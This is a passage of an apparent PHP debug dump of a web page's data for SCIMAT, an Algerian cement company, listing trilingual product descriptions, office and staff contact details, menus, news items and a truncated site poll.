to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The </span></span><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-rmn-container">
<p style="text-align:left"> </p>
</div>
<p> </p>
</div>
</div>
',
'img_prd' => 'produit-1716888919.png',
'img_prd_detail' => '',
'Code_Pr' => '89963',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1709106473.pdf',
'pos_slider' => '8'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 8 => array(
'Produit' => array(
'id' => '878836',
'nom_fr' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_ara' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_en' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm </strong> est un mélange de Granulats de toutes dimensions. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisation</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm</strong> est utilisé dans les :</span></span></p>
<ul>
<li><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Assises de Chaussées (Couche de Base)</strong></span></span></li>
</ul>
<p style="margin-left:36pt"> </p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إن <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> عبارة عن مزيج من الركام من جميع الأحجام.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>مجال الاستعمال</u> :</strong></span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم استخدام <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> في:</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الطبقات الأرضية (الطبقة الأساسية)</strong></span></span></small></li>
</ul>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is a mixture of aggregates of all sizes.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Use</strong></u></span><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is used in:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Ground Layers (Base Layer)</strong></span></span></li>
</ul>
',
'img_prd' => 'produit-1611671534.png',
'img_prd_detail' => '',
'Code_Pr' => '0',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611671534.pdf',
'pos_slider' => '2'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
)
)
$contacts = array(
(int) 0 => array(
'Contact' => array(
'id' => '27',
'nom_fr' => 'Direction Générale',
'nom_ara' => 'المديرية العامة',
'nom_en' => 'Executive management',
'email' => 'secretaire.dg@scimat.dz',
'adresse_fr' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'adresse_ara' => '73 مكرر,شارع بن فليس ,حي الاخظرار باتنة 0500',
'adresse_en' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'map' => '35.554507,6.17278',
'fax' => '+(213) 33 85 11 01',
'tel1' => '+(213) 33 85 13 00',
'tel2' => '+(213) 33 85 12 95',
'tel3' => '+(213) 33 85 14 54',
'mob1' => '',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2018-11-29'
)
),
(int) 1 => array(
'Contact' => array(
'id' => '29',
'nom_fr' => 'Direction Unité Cimenterie ',
'nom_ara' => 'مديرية وحدة مصنع الاسمنت',
'nom_en' => 'Cement Plant Management',
'email' => 'secretariat.u_cimenterie@scimat.dz',
'adresse_fr' => 'BP 10 Ain-Touta',
'adresse_ara' => 'ص.ب 10 عين التوتة',
'adresse_en' => 'BP 10 Ain-Touta',
'map' => '35.362334, 5.759595',
'fax' => '+ (213) 33 35 52 52',
'tel1' => '+(213) 33 35 13 00',
'tel2' => '',
'tel3' => '',
'mob1' => '066666',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2021-01-26'
)
),
(int) 2 => array(
'Contact' => array(
'id' => '32',
'nom_fr' => 'Direction Unité Commerciale Touggourt',
'nom_ara' => 'الوحدة التجارية تقرت',
'nom_en' => 'Direction Unité Commerciale Touggourt',
'email' => 'secretariat.uc_touggourt@scimat.dz',
'adresse_fr' => 'Touggourt',
'adresse_ara' => 'تقرت',
'adresse_en' => 'Touggourt',
'map' => '441',
'fax' => '+(213) 29 67 02 43',
'tel1' => '+(213) 29 67 28 58',
'tel2' => '',
'tel3' => '',
'mob1' => '+(213) 671 051 583 ',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2021-01-27'
)
),
(int) 3 => array(
'Contact' => array(
'id' => '33',
'nom_fr' => 'Direction Unité Agrégats ',
'nom_ara' => 'وحدة الحصى عين التوتة',
'nom_en' => 'Management Unit Aggregates',
'email' => 'secretariat.u_agregats@scimat.dz',
'adresse_fr' => 'Ain-Touta',
'adresse_ara' => 'Ain -Touta',
'adresse_en' => 'Ain -Touta',
'map' => '35.345069, 5.760135',
'fax' => '+(213) 33 35 57 84',
'tel1' => '+(213) 33 35 57 84',
'tel2' => '',
'tel3' => '',
'mob1' => '+(213) 661 ',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2021-01-27'
)
)
)
$sociales = array(
(int) 0 => array(
'Sociale' => array(
'id' => '1',
'nom' => 'Facebook',
'lien' => 'https://www.facebook.com/scimat.dz',
'image' => 'fab fa-facebook-f ',
'color' => '#4267B2',
'date_ajout' => '2016-05-02'
)
),
(int) 1 => array(
'Sociale' => array(
'id' => '2',
'nom' => 'Instagram',
'lien' => 'https://www.instagram.com/',
'image' => 'fab fa-instagram',
'color' => 'linear-gradient(45deg, #405de6, #5851db, #833ab4, #c13584, #e1306c, #fd1d1d)',
'date_ajout' => '2020-11-17'
)
),
(int) 2 => array(
'Sociale' => array(
'id' => '3',
'nom' => 'whatsapp',
'lien' => 'https://whatsapp.com',
'image' => 'fab fa-whatsapp',
'color' => '#25D366',
'date_ajout' => '2018-11-03'
)
),
(int) 3 => array(
'Sociale' => array(
'id' => '4',
'nom' => 'youtube',
'lien' => 'http://www.youtube.com/@scimatgica ',
'image' => 'fab fa-youtube',
'color' => '#FF0000',
'date_ajout' => '2018-12-23'
)
),
(int) 4 => array(
'Sociale' => array(
'id' => '5',
'nom' => 'Linkedin',
'lien' => 'linkedin.com/in/scimat',
'image' => 'fab fa-linkedin',
'color' => '#4267B2',
'date_ajout' => '2024-02-07'
)
),
(int) 5 => array(
'Sociale' => array(
'id' => '6',
'nom' => 'X',
'lien' => 'www.twitter.com/ScimatGica',
'image' => 'fab fa-twitter',
'color' => '#4267B2',
'date_ajout' => '2024-02-07'
)
)
)
$contact = array(
'Contact' => array(
'id' => '27',
'nom_fr' => 'Direction Générale',
'nom_ara' => 'المديرية العامة',
'nom_en' => 'Executive management',
'email' => 'secretaire.dg@scimat.dz',
'adresse_fr' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'adresse_ara' => '73 مكرر,شارع بن فليس ,حي الاخظرار باتنة 0500',
'adresse_en' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'map' => '35.554507,6.17278',
'fax' => '+(213) 33 85 11 01',
'tel1' => '+(213) 33 85 13 00',
'tel2' => '+(213) 33 85 12 95',
'tel3' => '+(213) 33 85 14 54',
'mob1' => '',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2018-11-29'
)
)
$menus = array(
(int) 0 => array(
'Menu' => array(
'id' => '1',
'nom_fr' => 'Accueil',
'nom_ara' => 'الرئيسية',
'nom_en' => 'Home',
'controller' => 'Pages',
'action' => 'display'
),
'Pluspage' => array()
),
(int) 1 => array(
'Menu' => array(
'id' => '2',
'nom_fr' => 'Présentation',
'nom_ara' => 'من نحن ؟',
'nom_en' => 'Presentation',
'controller' => 'Apropos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 2 => array(
'Menu' => array(
'id' => '3',
'nom_fr' => 'Produits',
'nom_ara' => 'المنتوجات',
'nom_en' => 'Products',
'controller' => 'Produits',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 3 => array(
'Menu' => array(
'id' => '4',
'nom_fr' => 'Certification',
'nom_ara' => 'الشهادة',
'nom_en' => 'Certification',
'controller' => 'Certifications',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 4 => array(
'Menu' => array(
'id' => '5',
'nom_fr' => 'Commerciale',
'nom_ara' => 'تجاري',
'nom_en' => 'Commercial',
'controller' => 'Reseaucommercials',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 5 => array(
'Menu' => array(
'id' => '8',
'nom_fr' => 'Appeloffres',
'nom_ara' => 'المناقصات',
'nom_en' => 'Tenders',
'controller' => 'Appeloffres',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 6 => array(
'Menu' => array(
'id' => '9',
'nom_fr' => 'Actualités',
'nom_ara' => 'أخبار',
'nom_en' => 'News',
'controller' => 'Actualites',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 7 => array(
'Menu' => array(
'id' => '10',
'nom_fr' => 'R.S.E',
'nom_ara' => 'المسؤولية الاجتماعية للشر',
'nom_en' => 'C.S.R',
'controller' => 'Rses',
'action' => 'in'
),
'Pluspage' => array()
),
(int) 8 => array(
'Menu' => array(
'id' => '11',
'nom_fr' => 'Gallerie',
'nom_ara' => 'الصور والفيديو',
'nom_en' => 'Gallery',
'controller' => 'Albumphotos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 9 => array(
'Menu' => array(
'id' => '12',
'nom_fr' => 'Contacts',
'nom_ara' => 'اتصل بنا',
'nom_en' => 'Contacts',
'controller' => 'Contacts',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 10 => array(
'Menu' => array(
'id' => '13',
'nom_fr' => 'AUTRE',
'nom_ara' => 'آخر',
'nom_en' => 'Other',
'controller' => '',
'action' => 'index'
),
'Pluspage' => array()
)
)
$menu = array(
(int) 0 => array(
'Menu' => array(
'id' => '13',
'nom_fr' => 'AUTRE',
'nom_ara' => 'آخر',
'nom_en' => 'Other',
'controller' => '',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 1 => array(
'Menu' => array(
'id' => '12',
'nom_fr' => 'Contacts',
'nom_ara' => 'اتصل بنا',
'nom_en' => 'Contacts',
'controller' => 'Contacts',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 2 => array(
'Menu' => array(
'id' => '11',
'nom_fr' => 'Gallerie',
'nom_ara' => 'الصور والفيديو',
'nom_en' => 'Gallery',
'controller' => 'Albumphotos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 3 => array(
'Menu' => array(
'id' => '10',
'nom_fr' => 'R.S.E',
'nom_ara' => 'المسؤولية الاجتماعية للشر',
'nom_en' => 'C.S.R',
'controller' => 'Rses',
'action' => 'in'
),
'Pluspage' => array()
),
(int) 4 => array(
'Menu' => array(
'id' => '9',
'nom_fr' => 'Actualités',
'nom_ara' => 'أخبار',
'nom_en' => 'News',
'controller' => 'Actualites',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 5 => array(
'Menu' => array(
'id' => '8',
'nom_fr' => 'Appeloffres',
'nom_ara' => 'المناقصات',
'nom_en' => 'Tenders',
'controller' => 'Appeloffres',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 6 => array(
'Menu' => array(
'id' => '5',
'nom_fr' => 'Commerciale',
'nom_ara' => 'تجاري',
'nom_en' => 'Commercial',
'controller' => 'Reseaucommercials',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 7 => array(
'Menu' => array(
'id' => '4',
'nom_fr' => 'Certification',
'nom_ara' => 'الشهادة',
'nom_en' => 'Certification',
'controller' => 'Certifications',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 8 => array(
'Menu' => array(
'id' => '3',
'nom_fr' => 'Produits',
'nom_ara' => 'المنتوجات',
'nom_en' => 'Products',
'controller' => 'Produits',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 9 => array(
'Menu' => array(
'id' => '2',
'nom_fr' => 'Présentation',
'nom_ara' => 'من نحن ؟',
'nom_en' => 'Presentation',
'controller' => 'Apropos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 10 => array(
'Menu' => array(
'id' => '1',
'nom_fr' => 'Accueil',
'nom_ara' => 'الرئيسية',
'nom_en' => 'Home',
'controller' => 'Pages',
'action' => 'display'
),
'Pluspage' => array()
)
)
$menuara = array(
(int) 0 => array(
'Menu' => array(
'id' => '1',
'nom_fr' => 'Accueil',
'nom_ara' => 'الرئيسية',
'nom_en' => 'Home',
'controller' => 'Pages',
'action' => 'display'
),
'Pluspage' => array()
),
(int) 1 => array(
'Menu' => array(
'id' => '2',
'nom_fr' => 'Présentation',
'nom_ara' => 'من نحن ؟',
'nom_en' => 'Presentation',
'controller' => 'Apropos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 2 => array(
'Menu' => array(
'id' => '3',
'nom_fr' => 'Produits',
'nom_ara' => 'المنتوجات',
'nom_en' => 'Products',
'controller' => 'Produits',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 3 => array(
'Menu' => array(
'id' => '4',
'nom_fr' => 'Certification',
'nom_ara' => 'الشهادة',
'nom_en' => 'Certification',
'controller' => 'Certifications',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 4 => array(
'Menu' => array(
'id' => '5',
'nom_fr' => 'Commerciale',
'nom_ara' => 'تجاري',
'nom_en' => 'Commercial',
'controller' => 'Reseaucommercials',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 5 => array(
'Menu' => array(
'id' => '8',
'nom_fr' => 'Appeloffres',
'nom_ara' => 'المناقصات',
'nom_en' => 'Tenders',
'controller' => 'Appeloffres',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 6 => array(
'Menu' => array(
'id' => '9',
'nom_fr' => 'Actualités',
'nom_ara' => 'أخبار',
'nom_en' => 'News',
'controller' => 'Actualites',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 7 => array(
'Menu' => array(
'id' => '10',
'nom_fr' => 'R.S.E',
'nom_ara' => 'المسؤولية الاجتماعية للشر',
'nom_en' => 'C.S.R',
'controller' => 'Rses',
'action' => 'in'
),
'Pluspage' => array()
),
(int) 8 => array(
'Menu' => array(
'id' => '11',
'nom_fr' => 'Gallerie',
'nom_ara' => 'الصور والفيديو',
'nom_en' => 'Gallery',
'controller' => 'Albumphotos',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 9 => array(
'Menu' => array(
'id' => '12',
'nom_fr' => 'Contacts',
'nom_ara' => 'اتصل بنا',
'nom_en' => 'Contacts',
'controller' => 'Contacts',
'action' => 'index'
),
'Pluspage' => array()
),
(int) 10 => array(
'Menu' => array(
'id' => '13',
'nom_fr' => 'AUTRE',
'nom_ara' => 'آخر',
'nom_en' => 'Other',
'controller' => '',
'action' => 'index'
),
'Pluspage' => array()
)
)
$lien = 'https://scimat.dz/'
$destintaires = array(
'chawki.zeghdoud@scimat.dz' => ' Directeur d'Approvisionnement',
'said.fatah@scimat.dz' => ' Directeur Développement ',
'dir.marketing-ventes@scimat.dz' => ' Directeur Marketing et Ventes ',
'djamel.attir@scimat.dz' => ' Directeur des Finances et Budget ',
'foued.dine@scimat.dz' => ' Directeur d'Exploitation ',
'khaled.boulcina@scimat.dz' => 'Directeur d’Unité Agrégats ',
'maammar.bahloul@scimat.dz' => 'Président Directeur Général ',
'malika.chaouche@scimat.dz' => ' Assistante PDG Chargée des Systèmes d’Information ',
'salim.haneche@scimat.dz' => ' Assistant PDG Chargé de la Qualite du Produit ',
'secretaire.dg@scimat.dz' => 'secrétaire PDG',
'dir-rhs@scimat.dz' => 'Directeur des Ressources Humaines et Sociales ',
'abdesselam.aouachria@scimat.dz' => 'Assistant PDG Chargé du Système de Managent Intégré ',
'asst-pdg.contentieux@scimat.dz' => 'Assistant PDG Chargé du Contentieux',
'dir.uc_biskra@scimat.dz' => 'Directeur d'Unité Commerciale BISKRA'
)
$actualites = array(
(int) 0 => array(
'Actualite' => array(
'id' => '1',
'nom_fr' => 'Salons Professionnels de la production',
'nom_ara' => 'المعرض الوطني للانتاج',
'nom_en' => 'National tradeshow',
'contenu_en' => '<p>National tradeshow Aurès Assihar Batna for 06/11/2018 to 11/11/2018</p>
',
'contenu_fr' => '<p>Salon de la Production Nationale des Aurès Assihar Batna du 06/11/2018 au 11/11/2018</p>
',
'contenu_ara' => '<p dir="rtl">المعرض الوطني للانتاج اسحار باتنة من 06/11/2018 الى 11/11/2018</p>
',
'image' => '1616337700.jpg',
'date' => '2018-11-06',
'fichier' => 'fichier-1605773274.pdf'
),
'Media' => array(
(int) 594 => array(
[maximum depth reached]
),
(int) 607 => array(
[maximum depth reached]
),
(int) 606 => array(
[maximum depth reached]
),
(int) 605 => array(
[maximum depth reached]
),
(int) 604 => array(
[maximum depth reached]
),
(int) 603 => array(
[maximum depth reached]
),
(int) 602 => array(
[maximum depth reached]
),
(int) 601 => array(
[maximum depth reached]
),
(int) 600 => array(
[maximum depth reached]
),
(int) 599 => array(
[maximum depth reached]
),
(int) 598 => array(
[maximum depth reached]
),
(int) 597 => array(
[maximum depth reached]
),
(int) 596 => array(
[maximum depth reached]
),
(int) 595 => array(
[maximum depth reached]
)
)
),
(int) 1 => array(
'Actualite' => array(
'id' => '57',
'nom_fr' => ' Portes ouvertes ',
'nom_ara' => 'ابواب مفتوجة',
'nom_en' => 'portes ouvertes',
'contenu_en' => '<p>Culturel House Mohamed Laid El Khalifa Batna from 06/05/2018 to 10/05/2018 </p>
',
'contenu_fr' => '<p>Maison de la Culture Mohamed Laid El Khalifa Batna du 06/05/2018 au 10/05/2018 </p>
',
'contenu_ara' => '<p>دار الثقافة محمد العيد ال خليفة من 06/05/2018 الى 10/05/2018</p>
',
'image' => '1608192895.png',
'date' => '2018-05-06',
'fichier' => '1606814556.pdf'
),
'Media' => array(
(int) 579 => array(
[maximum depth reached]
),
(int) 593 => array(
[maximum depth reached]
),
(int) 592 => array(
[maximum depth reached]
),
(int) 591 => array(
[maximum depth reached]
),
(int) 590 => array(
[maximum depth reached]
),
(int) 589 => array(
[maximum depth reached]
),
(int) 588 => array(
[maximum depth reached]
),
(int) 587 => array(
[maximum depth reached]
),
(int) 586 => array(
[maximum depth reached]
),
(int) 585 => array(
[maximum depth reached]
),
(int) 584 => array(
[maximum depth reached]
),
(int) 583 => array(
[maximum depth reached]
),
(int) 582 => array(
[maximum depth reached]
),
(int) 580 => array(
[maximum depth reached]
)
)
)
)
$sondages = array(
(int) 0 => array(
'Sondage' => array(
'id' => '2',
'nom_fr' => 'Que pensez vous du site ?',
'nom_ara' => 'ما رأيك في الموقع؟',
'nom_en' => 'What do you think of the site ?',
'contenu_fr' => '',
'contenu_ara' => '<p><br />
</p>
',
'contenu_en' => '',
'active' => '1',
'nbr_vote' => '8569',
'created' => '2016-05-21 16:16:44'
),
'Proposition' => array(
(int) 0 => array(
[maximum depth reached]
),
(int) 1 => array(
[maximum depth reached]
),
(int) 2 => array(
[maximum depth reached]
)
),
'Vote' => array(
(int) 0 => array(
[maximum depth reached]
),
(int) 1 => array(
[maximum depth reached]
),
(int) 2 => array(
[maximum depth reached]
),
(int) 3 => array(
[maximum depth reached]
),
(int) 4 => array(
[maximum depth reached]
),
(int) 5 => array(
[maximum depth reached]
),
(int) 6 => array(
[maximum depth reached]
),
(int) 7 => array(
[maximum depth reached]
),
(int) 8 => array(
[maximum depth reached]
),
(int) 9 => array(
[maximum depth reached]
),
(int) 10 => array(
[maximum depth reached]
),
(int) 11 => array(
[maximum depth reached]
),
(int) 12 => array(
[maximum depth reached]
),
(int) 13 => array(
[maximum depth reached]
),
(int) 14 => array(
[maximum depth reached]
),
(int) 15 => array(
[maximum depth reached]
),
(int) 16 => array(
[maximum depth reached]
),
(int) 17 => array(
[maximum depth reached]
),
(int) 18 => array(
[maximum depth reached]
),
(int) 19 => array(
[maximum depth reached]
),
(int) 20 => array(
[maximum depth reached]
),
(int) 21 => array(
[maximum depth reached]
),
(int) 22 => array(
[maximum depth reached]
),
(int) 23 => array(
[maximum depth reached]
),
(int) 24 => array(
[maximum depth reached]
),
(int) 25 => array(
[maximum depth reached]
),
(int) 26 => array(
[maximum depth reached]
),
(int) 27 => array(
[maximum depth reached]
),
(int) 28 => array(
[maximum depth reached]
),
(int) 29 => array(
[maximum depth reached]
),
(int) 30 => array(
[maximum depth reached]
),
(int) 31 => array(
[maximum depth reached]
),
(int) 32 => array(
[maximum depth reached]
),
(int) 33 => array(
[maximum depth reached]
),
(int) 34 => array(
[maximum depth reached]
),
(int) 35 => array(
[maximum depth reached]
),
(int) 36 => array(
[maximum depth reached]
),
(int) 37 => array(
[maximum depth reached]
),
(int) 38 => array(
[maximum depth reached]
),
(int) 39 => array(
[maximum depth reached]
),
(int) 40 => array(
[maximum depth reached]
),
(int) 41 => array(
[maximum depth reached]
),
(int) 42 => array(
[maximum depth reached]
),
(int) 43 => array(
[maximum depth reached]
),
(int) 44 => array(
[maximum depth reached]
),
(int) 45 => array(
[maximum depth reached]
),
(int) 46 => array(
[maximum depth reached]
),
(int) 47 => array(
[maximum depth reached]
),
(int) 48 => array(
[maximum depth reached]
),
(int) 49 => array(
[maximum depth reached]
),
(int) 50 => array(
[maximum depth reached]
),
(int) 51 => array(
[maximum depth reached]
),
(int) 52 => array(
[maximum depth reached]
),
(int) 53 => array(
[maximum depth reached]
),
(int) 54 => array(
[maximum depth reached]
),
(int) 55 => array(
[maximum depth reached]
),
(int) 56 => array(
[maximum depth reached]
),
(int) 57 => array(
[maximum depth reached]
),
(int) 58 => array(
[maximum depth reached]
),
(int) 59 => array(
[maximum depth reached]
),
(int) 60 => array(
[maximum depth reached]
),
(int) 61 => array(
[maximum depth reached]
),
(int) 62 => array(
[maximum depth reached]
),
(int) 63 => array(
[maximum depth reached]
),
(int) 64 => array(
[maximum depth reached]
),
(int) 65 => array(
[maximum depth reached]
),
(int) 66 => array(
[maximum depth reached]
),
(int) 67 => array(
[maximum depth reached]
),
(int) 68 => array(
[maximum depth reached]
),
(int) 69 => array(
[maximum depth reached]
),
(int) 70 => array(
[maximum depth reached]
),
(int) 71 => array(
[maximum depth reached]
),
(int) 72 => array(
[maximum depth reached]
),
(int) 73 => array(
[maximum depth reached]
),
(int) 74 => array(
[maximum depth reached]
),
(int) 75 => array(
[maximum depth reached]
),
(int) 76 => array(
[maximum depth reached]
),
(int) 77 => array(
[maximum depth reached]
),
(int) 78 => array(
[maximum depth reached]
),
(int) 79 => array(
[maximum depth reached]
),
(int) 80 => array(
[maximum depth reached]
),
(int) 81 => array(
[maximum depth reached]
),
(int) 82 => array(
[maximum depth reached]
),
(int) 83 => array(
[maximum depth reached]
),
(int) 84 => array(
[maximum depth reached]
),
(int) 85 => array(
[maximum depth reached]
),
(int) 86 => array(
[maximum depth reached]
),
(int) 87 => array(
[maximum depth reached]
),
(int) 88 => array(
[maximum depth reached]
),
(int) 89 => array(
[maximum depth reached]
),
(int) 90 => array(
[maximum depth reached]
),
(int) 91 => array(
[maximum depth reached]
),
(int) 92 => array(
[maximum depth reached]
),
(int) 93 => array(
[maximum depth reached]
),
(int) 94 => array(
[maximum depth reached]
),
(int) 95 => array(
[maximum depth reached]
),
(int) 96 => array(
[maximum depth reached]
),
(int) 97 => array(
[maximum depth reached]
),
(int) 98 => array(
[maximum depth reached]
),
(int) 99 => array(
[maximum depth reached]
),
(int) 100 => array(
[maximum depth reached]
),
(int) 101 => array(
[maximum depth reached]
),
(int) 102 => array(
[maximum depth reached]
),
(int) 103 => array(
[maximum depth reached]
),
(int) 104 => array(
[maximum depth reached]
),
(int) 105 => array(
[maximum depth reached]
),
(int) 106 => array(
[maximum depth reached]
),
(int) 107 => array(
[maximum depth reached]
),
(int) 108 => array(
[maximum depth reached]
),
(int) 109 => array(
[maximum depth reached]
),
(int) 110 => array(
[maximum depth reached]
),
(int) 111 => array(
[maximum depth reached]
),
(int) 112 => array(
[maximum depth reached]
),
(int) 113 => array(
[maximum depth reached]
),
(int) 114 => array(
[maximum depth reached]
),
(int) 115 => array(
[maximum depth reached]
),
(int) 116 => array(
[maximum depth reached]
),
(int) 117 => array(
[maximum depth reached]
),
(int) 118 => array(
[maximum depth reached]
),
(int) 119 => array(
[maximum depth reached]
),
(int) 120 => array(
[maximum depth reached]
),
(int) 121 => array(
[maximum depth reached]
),
(int) 122 => array(
[maximum depth reached]
),
(int) 123 => array(
[maximum depth reached]
),
(int) 124 => array(
[maximum depth reached]
),
(int) 125 => array(
[maximum depth reached]
),
(int) 126 => array(
[maximum depth reached]
),
(int) 127 => array(
[maximum depth reached]
),
(int) 128 => array(
[maximum depth reached]
),
(int) 129 => array(
[maximum depth reached]
),
(int) 130 => array(
[maximum depth reached]
),
(int) 131 => array(
[maximum depth reached]
),
(int) 132 => array(
[maximum depth reached]
),
(int) 133 => array(
[maximum depth reached]
),
(int) 134 => array(
[maximum depth reached]
),
